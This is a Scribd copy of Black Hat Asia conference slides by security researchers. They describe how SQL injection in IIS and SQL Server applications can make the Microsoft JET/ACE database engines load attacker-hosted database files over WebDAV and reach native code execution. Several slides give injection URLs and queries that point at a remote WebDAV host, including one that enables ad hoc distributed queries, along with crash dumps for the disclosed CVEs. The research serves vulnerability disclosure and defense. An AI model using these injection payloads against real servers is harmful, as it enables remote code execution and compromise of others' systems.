Scribd
Upload
187 views53 pages

SQL Injection IIS

A SQL injection vulnerability was found in an IIS web application using an Access database. By crafting a malicious SQL query, an attacker could exploit this to execute arbitrary code in the IIS process context with the privileges of the DefaultAppPool user. A proof of concept exploit was demonstrated targeting a specific IIS server.

Uploaded by

taha deghies
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
187 views53 pages

SQL Injection IIS

A SQL injection vulnerability was found in an IIS web application using an Access database. By crafting a malicious SQL query, an attacker could exploit this to execute arbitrary code in the IIS process context with the privileges of the DefaultAppPool user. A proof of concept exploit was demonstrated targeting a specific IIS server.

Uploaded by

taha deghies
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 53

“Give Me a SQL Injection,

I Shall PWN IIS and SQL Server”


Tao Yan (@Ga1ois), Qi Deng and Bo Qu
Palo Alto Networks

#BHASIA @BLACKHATEVENTS
Agenda
• Who are we
• Introduction: motivation and background
• A new remote attack surface in IIS and SQL Server
• Three attack scenarios
• Attack IIS with a SQL injection in Access database - demo
• Attack SQL Server with a SQL injection in SQL Server database - demo
• Attack IIS with a web shell [bonus] - demo
• Summary
Who Are We
• We are security researchers from Palo Alto Networks
• Tao Yan (@Ga1ois)
• Qi Deng
• Bo Qu
• Regular conference presenter
• Black Hat, CanSecWest, Blue Hat, Recon, POC, HITCON, etc
• Regular top vulnerability contributor for Microsoft, Adobe, Apple, etc
• Several times in MSRC TOP 10 Researchers
Agenda
• Who are we
• Introduction: motivation and background
• A new remote attack surface in IIS and SQL Server
• Three attack scenarios
• Attack IIS with a SQL injection in Access database - demo
• Attack SQL Server with a SQL injection in SQL Server database - demo
• Attack IIS with a web shell [bonus] - demo
• Summary
Motivation and background
• Is there any new attack surface in IIS and SQL Server?
• Can SQL injection only be used to view data in the database?
• What is Microsoft JET database engine and who can use it?
Motivation and background
• Attack surfaces in IIS and SQL Server are very limited.
Motivation and background
• What is SQL Injection?
• Execute unintended SQL queries in the target database.
• What we previously know SQL injection can do?
• View data in the database.
• What we previously know SQL injection can NOT do?
• Execute native code in the web application or database process.
• Execute shell commands or read/write arbitrary files if not having high
privileges in specific databases. (such as xp_cmdshell with sa in SQL Server)
Motivation and background
• Microsoft JET database engine
• ~30 years old and not well maintained, but still massively used.
• Natively supported on all Windows versions.
Who can use Microsoft JET database engine?
• Office is not an ideal target.
• Neither is wscript.exe.
Motivation and background
• How about combine all of those 3 topics together?
• Is it possible to use vulnerabilities in JET database engine to attack IIS
and SQL Server by executing arbitrary SQL queries in remote
controllable database based on the SQL injection and get native code
execution capability in IIS and SQL Server process?
Agenda
• Who are we
• Introduction: motivation and background
• A new remote attack surface on IIS and SQL Server
• Three attack scenarios
• Attack IIS with a SQL injection in Access database - demo
• Attack SQL Server with a SQL injection in MSSQL database - demo
• Attack IIS with a web shell [bonus] - demo
• Summary
Cross Database SQL Query in Access and SQL
Server
Access
Select * from [ExternalDatabase][table]

SQL Server
SELECT * FROM opendatasource('provider', 'data source=ExternalDatabase ')...[table]

SELECT * FROM OPENROWSET(‘provider', 'Database=ExternalDatabase', 'SELECT * FROM [table]')

EXEC sp_addlinkedserver
@server = ‘ServerName',
@srvproduct = ‘ServerProduct',
@provider = ‘provider',
@datasrc = ‘ExternalDatabase',
@provstr = ‘ProviderString';
External database and provider
• External Database can be a different database type, such as JET
database? Access:
use JET Provider by default: msjet40.dll

SQL SERVER: JET related Provider:


Microsoft.Jet.OLEDB.4.0 à msjet40.dll
Microsoft.ACE.OLEDB.12.0 à acecore.dll

• External Database can be on the remote server?


UNC path parsing msjet 4.0
UNC path msjet40!ErrTryOpenDatabase IsForeignDatabase?
no yes

msjet40!ErrOpenDatabase msjet40!ErrOpenForeignDatabase

msjet40!IsamOpenDatabase msrd3x40!IsamOpenDatabase msexcl40!WBISAMOpenDatabase


msjet40!Session::OpenDatabase msrd3x40! Session::OpenDatabase msexcl40!WorkbookOpen
msjet40!Database::OpenFile msrd3x40! Database::OpenFile msexcl40!OpenBiffFile
msjet40!File::Open msrd3x40!File::Open msexcl40!ExcelOpenFile
msjet40!File::ReallyOpen msrd3x40!File::ReallyOpen msexcl40!BFOpenFile
msjet40!JetCreateFileW msrd3x40!JetCreateFileW msrd3x40!OSOpenFile

Coml2!StgOpenStorage
UNC path kernel32!CreateFileW Coml2!DfOpenDocFile
Coml2!DfFromName
Coml2!CFileStream::InitWorker
Coml2!CFileStream::Init_OpenOrCreate
UNC path parsing in acecore (msjet 12.0)
The hidden feature for CreateFile(UNC) in IIS and SQL Server

• CreateFile(UNC) in IIS and SQL Server uses SMB and WEBDAV


CreateFile(UNC) with SMB in IIS and SQL Server
• SMB works on win7, fails on win10
CreateFile(UNC) with WEBDAV in IIS and SQL Server

• Webdav works on all Windows versions


More features/protocols from msexcl40
int __stdcall WBISAMOpenDatabase(…)
{

if ( NetProtocolType((int)pszDest) )
{
NetCreateLocalDirectory(Path, 0x105u);
NetDownloadToLocal(pszDest, 0, Path, FileName, 0x105u);
...
WorkbookCreate();
..
WorkbookOpen(); Wininet
… InternetOpen
} …
… FtpGetFile
} …
SQL Injection in Access with cross database query

Asp code
const strDBPath ="database/#data.mdb"
set conn = server.createobject("adodb.connection")
conn.open "DRIVER={Microsoft Access Driver (*.mdb)};DBQ="+server.mappath(strDBPath)+";pwd="
id=request("id")
sql="select * from product where id="&id id=1513 and (SELECT [fc4] FROM [Excel
set rs=conn.execute(sql) 8.0;Database=\\10.2.156.63/webdav/poc237.xls].[ft8])

sql = select * from product where id=1513 and (SELECT [fc4] FROM
[Excel 8.0;Database=\\10.2.156.63/webdav/poc237.xls].[ft8])
Cross database query call stack in IIS + ASP + Access

msjet40 -> ErrTryOpenDatabase

odbc32+odbcjt32

msado15+msdasql

vbscript

asp
SQL Injection in SQL Server with cross database query

Asp code
set conn = server.createobject("adodb.connection")
conn.open "provider=sqloledb;data source=DESKTOP-32BIT\SQLEXPRESS;uid=test;pwd=123456;database=testdb"
id=request("id")
sql="select * from persons where personid="&id id=1;UPDATE opendatasource('Microsoft.ACE.OLEDB.12.0',
set rs=conn.execute(sql) 'data source=\\10.2.156.63\webdav\poc42cf.mdb')...[ft8] SET
[fc3] = [fc3] + 47774 WHERE [fc3] <= 7 OR [fc2] <= 5;

sql = select * from persons where personid=1;UPDATE opendatasource('Microsoft.ACE.OLEDB.12.0', 'data


source=\\10.2.156.63\webdav\poc42cf.mdb')...[ft8] SET [fc3] = [fc3] + 47774 WHERE [fc3] <= 7 OR [fc2] <= 5;
Msjet 4.0 cross database query call stack in SQL Server
msjet40 -> JetOpenDatabase

msjetoledb40

oledb32

sqllang

sqldk
Msjet 12.0 Acecore cross database query call stack in SQL Server

Aceoledb + Acecore

oledb32

Sqllang + sqlmin

sqldk
A new remote attack surface on IIS and SQL Server
• The new attack surface
• The capability of executing any SQL query on any attacker controllable
database in IIS and SQL Server based on a SQL Injection.
• Fuzzing based on the mutations on SQL queries and JET database files.
• The code development and testing are based on the correct database file.
• It is a huge gold mine, we have found ~100 vulnerabilities here.
• Limitations
• Only select query is available in Access database.
• Acecore is not installed by default.
Agenda
• Who are we
• Introduction: motivation and background
• A new remote attack surface on IIS and SQL Server
• Three attack scenarios
• Attack IIS with a SQL injection in Access database - demo
• Attack SQL Server with a SQL injection in SQL Server database - demo
• Attack IIS with a web shell [bonus] - demo
• Summary
Scenario 1: IIS + Access

Database Target Database Vulnerable Supported Trigger Security boundary


requirement privilege components SQL
in SQL
Injection
Access SQL N/A All JET 4.0 Select One From a SQL injection in Access
Injection components: only query single to IIS DoS, info leak or RCE with
msjet40, web DefaultAppPool in w3wp.exe
Default msrd3x40, request process.
setup msexcl40, etc
Scenario 1: IIS + Access, CVE-2021-XXXX

http://127.0.0.1/access_injection.asp?id=1513
%20and%20(SELECT TOP 44 [ft4].[fc3] AS [c01]
FROM
[\\10.2.156.63/webdav/poc7c.mdb].[ft4]
WHERE [ft4].[fc3] <> 2 GROUP BY [ft4].[fc3])
Scenario 1: IIS + Access, CVE-2021-XXXX
6a0e166a lea eax,[esi+34h] <-- esi is the TableMover object
6a0e166d je msrd3x40!TableMover::RecordAddress+0x59 (6a0e1679)
6a0e166f cmp dword ptr [esi+10h],0
6a0e1673 je msrd3x40!TableMover::RecordAddress+0x1f3 (6a0e1813)
6a0e1679 push eax
6a0e167a push dword ptr [esi+0Ch]
6a0e167d mov ecx,edi
6a0e167f call msrd3x40!DataPage::RecordAddress (6a0bb410) <-- esi+0x34 was set in it
6a0e1684 cmp eax,4 <-- eax=1 when 0x4800
6a0e1687 ja msrd3x40!TableMover::RecordAddress+0x148 (6a0e1768)
6a0e168d jmp dword ptr msrd3x40!TableMover::RecordAddress+0x288 (6a0e18a8)[eax*4]
6a0e1694 mov eax,dword ptr [esi+34h] <-- eax is from esi+0x34; jump case 1
6a0e1697 lea ebx,[esi+24h]
6a0e169a mov ecx,ebx
6a0e169c mov edi,dword ptr [eax] ds:002b:26de7000=????????
Scenario 1: IIS + Access, CVE-2021-XXXX
msrd3x40!TableMover à before msrd3x40!TableMover à after
0b7e4fb8 6a0a63cc 15302e90 00000000 0000ff02 0b7e4fb8 6a0a63cc 15302e90 00000000 0000ff02
0b7e4fc8 00000000 26dd2cd4 26de6800 00000001 0b7e4fc8 00000000 26dd2cd4 26de6800 00000001
0b7e4fd8 c0c0c0c0 00000000 00000000 c0c0c0c0 0b7e4fd8 c0c0c0c0 00000000 00000000 c0c0c0c0
0b7e4fe8 c0c0c0c0 00000000 00000000 00000000 0b7e4fe8 c0c0c0c0 26de7000 00000000 00000000
0b7e4ff8 00000000 0b7e4ff8 00000000
0:020:x86> !address 26de6800
Usage: <unknown>
Base Address: 00000000`26dd0000
0:020:x86> db 26de6800 End Address: 00000000`26de7000
26de6800 09 01 d6 07 14 00 00 00-10 00 00 c8 00 c8 00 48
26de6810 00 c8 00 c8 00 c8 00 c8-00 c8 00 c8 00 c8 00 c8
26de6820 00 c8 00 c8 00 c8 00 c8-00 c8 00 ff ff 00 00 00
26de6830 00 00 00 00 00 00 00 00-00 00 12 00 00 00 00 00
26de6840 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
26de6850 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
26de6860 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
26de6870 00 00 00 61 72 74 6c 61-72 2e 53 00 00 00 00 00
How to find CVE-2021-XXXX
• SELECT TOP 44 [ft4].[fc3] AS [c01] FROM
[\\10.2.156.63/webdav/poc7c.mdb].[ft4] WHERE [ft4].[fc3] <> 2
GROUP BY [ft4].[fc3]
• Power of database file mutations
original mutative
CVE-2021-XXXX Demo
Scenario 2: IIS + SQL Server
Database Target Database Vulnerable Supported SQL Trigger Security boundary
requirement privilege in SQL components
Injection
SQL SQL Injection public with ad All JET All SQL queries, One From a SQL injection in
Server hoc enabled or components: multiple query single SQL Server to SQL Server
32bit Default setup SA to enable ad msjet40, statements, web DoS, info leak or RCE with
hoc to access the msrd3x40, action query request MSSQLSERVER user in
remote database msexcl40, and across table sqlservr.exe process.
acecore, etc query
SQL SQL Injection public with ad acecore ALL SQL One
Server hoc enabled or queries, single
64bit Access SA to enable ad multiple query web
Redistributable hoc to access the statements, request
installed remote database action query
and across table
query
Scenario 2: IIS + SQL Server, CVE-2020-1711

http://127.0.0.1/mssql_injection.asp?id=1;exec%20
sp_configure%20%27show%20advanced%20options
%27,%201;RECONFIGURE;exec%20sp_configure%20
%27Ad%20Hoc%20Distributed%20Queries%27,%20
1;RECONFIGURE;UPDATE%20opendatasource(%27
Microsoft.ACE.OLEDB.12.0%27,%20%27data%20sou
rce=\\10.2.156.63\webdav\poc42cf.mdb%27)...[ft8]
%20SET%20[fc3]%20=%20[fc3]%20%2b%2047774%
20WHERE%20[fc3]%20%3C=%207%20OR%20[fc2]%
20%3C=%205;
Scenario 2: IIS + SQL Server, CVE-2020-1711
After overflow Before overflow
0:000> dd 1ca2efd8 0:000> dc 1ca2efd8
1ca2efd8 1ca2f020 00000039 00000fdc 1ca2f000 1ca2efd8 1ca2f020 00000039 00000fdc 1ca2f000 ...9...........
1ca2efe8 00000020 00000000 37a30afc 1b001b04 1ca2efe8 00000020 00000000 1ca2effc 00000004 ...............
1ca2eff8 1b001b00 1b001b00 1b001b00 1b001b00 1ca2eff8 00000000 00000000 00000000 00000000 ................
1ca2f008 1b001b00 1b001b00 1b001b00 1b001b00 1ca2f008 00000000 00000000 00000000 00000000 ................
1ca2f018 1b001b00 1b001b00 1b001b03 19ff1b00 1ca2f018 00000000 00000000 00000003 feff0000 ................
1ca2f028 4d314931 4f324c33 53375135 4c355137 1ca2f028 32312e30 34323133 38373635 31353637 0.12312456787651
1ca2f038 50334f32 52355134 4bff1a32 4e324c2e 1ca2f038 35333432 37353634 30feff32 3332312e 243546572..0.123
1ca2f048 50344d31 52385236 4d315036 4f354e34 1ca2f048 35343231 37383736 32313536 34353334 1245678765124354
1ca2f058 4d375036 4c354f33 4e354f33 4e345132 1ca2f058 32373536 31353433 33353433 33343632 6572345134532643
1ca2f068 49004337 01002100 00000700 00000000 1ca2f068 2e002837 01000600 00000700 00000000 7(..............

Crash info 0:000> !heap -p -a 0x1ca2efd8


This exception may be expected and handled. address 1ca2efd8 found in
eax=00000000 ebx=1b001b00 ecx=1ca2efff _DPH_HEAP_ROOT @ 6181000
edx=00000000 esi=1b001b04 edi=37a30afc in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize
eip=5bdb43df esp=028fd4dc ebp=028fd67c 1c562410: 1ca2efd8 1024
ACECORE+0x43df:
5bdb43df 220c07 and cl,byte ptr [edi+eax] ds:002b:37a30afc=??
Scenario 2: IIS + SQL Server, CVE-2020-1711
; Out of boundary write
5be4fe7d 8b4d10 mov ecx,dword ptr [ebp+10h]; length ecx = 0x3e which is defined in the database file
5be4fe80 8b45d4 mov eax,dword ptr [ebp-2Ch]; value buffer to be updated
5be4fe83 41 inc ecx ; ecx = 0x3f
5be4fe84 8b5508 mov edx,dword ptr [ebp+8] ; from arg, dx = 0x1b
5be4fe87 660110 add word ptr [eax],dx ; add 0x1b for each word value in the buffer
5be4fe8a 8d40fe lea eax,[eax-2] ; move buffer pointer
5be4fe8d 83e901 sub ecx,1
5be4fe90 75f5 jne ACECORE+0x9fe87 (5be4fe87) ; loop

0:000> dw 1ca2f06d - 3f*2


1ca2efef fc00 a2ef 041c 0000 0000 0000 0000 0000
The length should be 0x28 (0x50/2).
1ca2efff 0000 0000 0000 0000 0000 0000 0000 0000
1ca2f00f 0000 0000 0000 0000 0000 0000 0000 0000 But it is 0x3e, out of boundary write happens!
1ca2f01f 0300 0000 0000 ff00 30fe 312e 3332 3231 Where is length 0x3e from?
1ca2f02f 3534 3736 3738 3536 3231 3334 3435 3536
1ca2f03f 3237 feff 2e30 3231 3133 3432 3635 3837
Is it controllable?
1ca2f04f 3637 3135 3432 3533 3634 3735 3332 3534 Is there any check?
1ca2f05f 3331 3534 3233 3436 3733 0028 002e 0006
0:000> dc 1ca2efd8
1ca2efd8 1ca2f020 00000039 00000fdc 1ca2f000 ...9...........
1ca2efe8 00000020 00000000 1ca2effc 00000004 ...............
1ca2eff8 00000000 00000000 00000000 00000000 ................
1ca2f008 00000000 00000000 00000000 00000000 ................
1ca2f018 00000000 00000000 00000003 feff0000 ................
1ca2f028 32312e30 34323133 38373635 31353637 0.12312456787651
1ca2f038 35333432 37353634 30feff32 3332312e 243546572..0.123
1ca2f048 35343231 37383736 32313536 34353334 1245678765124354
1ca2f058 32373536 31353433 33353433 33343632 6572345134532643
1ca2f068 2e002837 01000600 00000700 00000000 7(..............

0:000>
eax=1c9d1f38 ebx=1ca28e50 ecx=1c9b7800 edx=1c9b7800 esi=1ca2efd8 edi=028fda0c
eip=5bdd0ce9 esp=028fd974 ebp=028fd98c
ACECORE+0x20ce9:
5bdd0ce9 8b7810 mov edi,dword ptr [eax+10h] ds:002b:1c9d1f48=0000003e
0:000> dc 1c9d1f38
1c9d1f38 5bf0f5fc 1c9d1f78 00000006 00000003 ...[x...........
1c9d1f48 0000003e 00000004 00000003 00000409 >...............
1c9d1f58 00010000 c0c0c0c0 00000000 00000000 ................
1c9d1f68 1c9b7e40 1c9b7800 00000000 00000000 @~...x..........
1c9d1f78 00630066 00000033 c0c0c0c0 c0c0c0c0 f.c.3...........
How to find CVE-2020-1711
• UPDATE opendatasource(‘Microsoft.ACE.OLEDB.12.0’, ‘data
source=\\10.2.156.63\webdav\poc42cf.mdb’)...[ft8] SET [fc3] = [fc3] +
47774 WHERE [fc3] <= 7 OR [fc2] <= 5
• Power of mutations on the database file

mutative original
CVE-2020-1711 Demo
Scenario 3: IIS + Web Shell

Target Vulnerable Supported SQL Trigger Security boundary


requirement components
Web shell All JET All SQL queries, Use Database Bypass restrictions of
components: multiple query module in the web shell cmd module.
Default setup or msjet40, statements, web shell. From web shell to
Access msrd3x40, action query and native code execution
Redistributable msexcl40, across table with DefaultAppPool in
installed acecore, etc query w3wp.exe process.
Scenario 3: IIS + Web Shell, CVE-2020-17062
Scenario 3: IIS + Web Shell, CVE-2020-17062
Scenario 3: IIS + Web Shell, CVE-2020-17062
acecore!PageDesc à before acecore!PageDesc à after
0:000> dd 18071008 0:000> dc 18071008-40
18071008 5bf10d58 00000000 1c7b4c8c 00000094 18070fc8 00000000 00000000 34000000 00800000 ...........4....
18071018 18071008 1c7b4bf0 00000000 00000020 18070fd8 00000000 5c000000 31007800 5c003200 .......\.x.1.2.\
18071028 18072000 00000028 18072000 00000028 18070fe8 34007800 36003500 78005c00 32003100 .x.4.5.6.\.x.1.2
18071038 18072000 00000028 18072000 00000028 18070ff8 31003300 33003500 5c003500 66007800 .3.1.5.3.5.\.x.f
18071048 18072000 00000005 00000000 00000005 18071008 41004100 67007800 47006700 01040704 .A.A.x.g.g.G....
18071058 00000000 00000005 00000000 00000000 18071018 18073f00 1c73cbf0 00000000 00000020 .?....s..... ...
18071068 0000000e 00000000 073de922 00000000 18071028 18072000 00000028 18072000 00000028 . ..(.... ..(...
18071078 00000000 00000000 00000000 18071038 18072000 00000028 18072000 00000028 . ..(.... ..(...

(618.20b8): Access violation - code c0000005 (first chance)
eax=41004100 ebx=00000014 ecx=18071008 edx=00000007 UPDATE [ft7] SET [fc3] = 35252, [fc0] = 4, [fc2] =
esi=67007800 edi=1c73cc8c '\x12\x456\x1231535\xfAAxgg', [fc4] = '%', [fc1] = 10
eip=5bddf672 esp=02afeea8 ebp=02afeecc WHERE [ft7].[fc3] <=
ACECORE+0x2f672: 120340536294792540.12312341125125;
5bddf672 ff10 call dword ptr [eax] ds:002b:41004100=????????
Scenario 3: IIS + Web Shell, CVE-2020-17062

0:000> !heap -p -a 0x1ff47020


address 1ff47020 found in
_DPH_HEAP_ROOT @ 6431000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize)
1fda3784: 1ff46fd8 1024

0:000> dd 1ff46fd8
1ff46fd8 1ff47020 0000044e 00000fdc 1ff47000
1ff46fe8 00000020 00000000 1ff46ffc 00000004
1ff46ff8 00000000 00000001 0000001f 00000000
1ff47008 00000000 00000000 00000000 00000000
1ff47018 00000000 00000000 9c400006 00000000
1ff47028 000a0000 00000000 00000000 00000000
Scenario 3: IIS + Web Shell, CVE-2020-17062
memcpy((void *)(v5 + (*(_WORD *)(v5 + 2 * 0 + 14) & 0x3FFF)), 0x1ff47020, 0x44e);

0:000> dd 18070000 --> v5 size = 0x1000


Overflow!
18070000 03480101 00000074 00000000 0bcc00d8
0x44e > 0x434 (0x1000 – 0xbcc)
18070010 035c0778 00000000 00000000 00000000

0:000> dd 18070bcc + 43c à dst Src


18071008 5bf10d58 00000000 1c73cc8c 00000094 0:000> dc 1ff47020 + 3fc
18071018 18071008 1c73cbf0 00000000 00000020 1ff4741c 00000000 00000000 34000000 00800000 ...........4....
18071028 18072000 00000028 18072000 00000028 1ff4742c 00000000 5c000000 31007800 5c003200 .......\.x.1.2.\
18071038 18072000 00000028 18072000 00000028 1ff4743c 34007800 36003500 78005c00 32003100 .x.4.5.6.\.x.1.2
18071048 18072000 00000005 00000000 00000005 1ff4744c 31003300 33003500 5c003500 66007800 .3.1.5.3.5.\.x.f
18071058 00000000 00000005 00000000 00000000 0:000> dc 1ff47020 + 43c
18071068 0000000e 00000000 073783ce 00000000 1ff4745c 41004100 67007800 47006700 01040704 .A.A.x.g.g.G....
18071078 00000000 00000000 00000000 5bf10d58 1ff4746c 00003f00 00000000 00000000 00000000 .?..............
How to find CVE-2020-17062
• Power of mutations on SQL
queries

• Heap grooming
• Execute multiple queries in
one database connection
• Try/catch each query in web
shell
CVE-2020-17062 Demo
Vulnerabilities in three attack scenarios
• Old
• From WinXP to Win10, over 20 years.
• Easy
• Weak or no mitigations: no CFG in msjet40.dll, msrd3x40.dll, acecore x86, etc
• Severe
• Get RCE with SYSTEM privilege remotely from code execution as
DefaultAppPool or MSSQLSERVER with SeImpersonatePrivilege capability with
token kidnapping.
• Microsoft did NOT treat NETWORK/LOCAL Service to SYSTEM as a security
boundary.
Summary
• Feature or vulnerability?
• Webdav feature opens a new world for attackers to remotely attack IIS and
SQL Server and makes it as easy as locally attacking Microsoft JET database
engine when there is a SQL injection. A great number of new vulnerabilities
were found in Microsoft JET database engine and could be used to attack IIS
and SQL Server.
• Backwards compatibility is bad.
• All Windows systems released in last decades including WIP(Windows Insider
Preview) are compatible with the ~30 years old Microsoft JET database engine.
• Defense and mitigation
• Pay more attention to webdav.
One more thing
• Security boundary
• JET vulnerabilities make “SQL query execution (on controllable JET database)”
equal “native code execution”.
• remote attack surface
• SQL query execution (on controllable JET database) in IIS/SQL Server = native code
execution in IIS/SQL Server
• from SQL Injection to remote SYSTEM.
• local attack surface
• ???
Acknowledge
• Thanks to Zhibin Zhang
Q&A

#BHASIA @BLACKHATEVENTS

You might also like